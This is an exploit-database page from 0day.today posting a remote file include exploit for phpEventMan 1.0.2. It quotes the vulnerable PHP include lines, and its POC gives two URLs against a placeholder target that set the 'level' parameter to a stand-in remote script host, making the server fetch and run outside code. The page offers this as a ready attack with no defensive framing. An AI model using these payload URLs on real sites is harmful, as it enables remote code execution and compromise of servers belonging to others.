[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

phpEventMan 1.0.2 (level) Remote File Include Vulnerabilities

Author
xoron
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1462
Category
web applications
Date add
01-02-2007
Platform
unsorted
=============================================================
phpEventMan 1.0.2 (level) Remote File Include Vulnerabilities
=============================================================



-----------------------------------------------

phpEventMan v1.0.2 (level) Remote File Include Exploit

-----------------------------------------------

Author: Cyber-Security

-----------------------------------------------

Code:

include_once($level."UserMan/controller/common.function.php");
include_once($level."Shared/sharedfunctions.php");

-----------------------------------------------

POC:

www.target.com/script_pat/Shared/controller/text.ctrl.php?level=http://evilscripts ?
www.target.com/script_pat/UserMan/controller/common.function.php?level=http://evilscripts ?

-----------------------------------------------



#  0day.today [2024-12-25]  #